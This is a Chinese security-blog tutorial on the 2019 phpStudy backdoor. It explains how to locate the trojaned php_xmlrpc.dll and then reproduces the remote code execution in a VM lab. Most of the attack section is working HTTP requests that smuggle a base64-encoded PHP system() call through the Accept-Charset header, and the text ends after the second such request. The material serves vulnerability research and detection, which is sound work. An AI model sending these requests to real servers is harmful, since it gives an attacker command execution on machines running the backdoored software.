前言:
各位FreeBuf观众的姥爷大家好,我是艾登——皮尔斯(玩看门狗时候注册的ID),最近安全圈好不热闹,北京时间9月20日“杭州公安”官微发布了“杭州警方通报打击涉网违法犯罪暨’净网2019′专项行动战果”推文,该“后门”无法被杀毒软件扫描删除,并且藏匿于软件某功能性代码中,极难被发现具有免杀性质。严重的威胁到了互联网的空间安全,让大量的互联网网名的个人隐私信息遭到存在大面积泄露的风险,这篇文章分为图文教程和视频教程(文章末尾)。
文章目录:
1.phpstudy后门检测
2.phpstudy远程RCE后门复现图文教程
3.phpstudy远程RCE后门复现教视频程
3.Python编写复现脚本
4.Python编写批量复现脚本
5.针对部署phpstudy环境服务器已沦陷的主机进行溯源分析/黑客入侵画像
6.修复建议
7.参考
准备工具:
VMware Workstation Pro
Windows7的/ 2008R2
BurpSuiteFree
phpStudy20161103.zip(文中使用)phpStudy20180211.zip
Python
一、phpstudy后门检测:(1)phpStudy20161103 后门位置存在于:
*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll
*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll
(2)phpStudy20180211后门位置存在于:
*:PHPTutorialPHPPHP-5.2.17extphp_xmlrpc.dll
*:PHPTutorialPHPPHP-5.4.45extphp_xmlrpc.dll
(3)找到“ php_xmlrpc,dll”后用记事本打开,“ Ctrl + F”搜索“ @eva ”字符串如果存在就存在后门:
(4)Phpstudy后门分析文章传送门:
https://www.freebuf.com/news/topnews/214912.html
https://www.cppentry.com/bencandy.php?fid=85&id=261791
二、phpstudy远程RCE后门复现图文教程:(1)虚拟机搭建好Phpstudy环境,我这里使用的是phpstudy2016版本
Phpstudy环境192.168.1.91
(2)浏览器访问靶机地址:http://192.168.1.91/
(3)浏览器设置本地代理并且打开BurpSuiteFree抓包
(4)phpstudy RCE POC:
GET / HTTP/1.1
Host: 192.168.43.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Accept-Charset:”commandbase64 string”
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
(5)CTRL + R把请求包转发到中继器模块
Accept-Charset:”command base64 string”中执行命令经过了的的Base64编码加密:
执行语句指令:system(‘whoami’);
BASE64 编码后:c3lzdGVtKCd3aG9hbWknKTs =
替换进去
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
还要把“ ”中的前面的空格删除。Accept-Encoding: gzip, deflatedeflate
(6)构造好执行语句为WHOAMI的POC如下:
GET / HTTP/1.1
Host: 192.168.1.91
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0